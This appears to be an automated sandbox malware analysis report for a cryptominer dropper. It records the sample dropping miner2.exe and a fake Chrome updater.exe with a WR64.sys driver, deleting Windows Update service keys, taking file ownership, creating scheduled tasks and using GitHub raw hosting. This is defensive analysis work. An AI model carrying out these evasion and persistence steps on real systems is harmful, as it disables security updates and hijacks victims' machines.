Malware Analysis Report

2024-11-16 12:27

Sample ID 240319-xfh6pscd3x
Target 6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
SHA256 6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28
Tags
discovery evasion exploit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28

Threat Level: Known bad

The file 6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28 was found to be: Known bad.

Malicious Activity Summary

discovery evasion exploit

Modifies security service

Stops running service(s)

Possible privilege escalation attempt

Modifies file permissions

Executes dropped EXE

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Launches sc.exe

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Modifies registry key

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-19 18:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-19 18:47

Reported

2024-03-19 18:51

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\miner2.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Temp\miner2.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Google\Chrome\updater.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Program Files\Google\Chrome\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Temp\miner2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 2668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 4340 wrote to memory of 1220 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 1220 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 4596 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 4596 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 1540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 1540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4596 wrote to memory of 4500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 4500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 1108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 3760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 3760 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 3148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 3148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 1044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 1044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 4236 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 4236 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 4696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 4696 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 1540 wrote to memory of 1676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3004 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4476 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4476 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 2448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4596 wrote to memory of 2448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4596 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4596 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4596 wrote to memory of 4856 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4856 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 4832 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 3528 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4596 wrote to memory of 5088 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 5088 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4288 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3340 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3340 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 4680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4596 wrote to memory of 3328 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4340 wrote to memory of 3332 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 3332 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
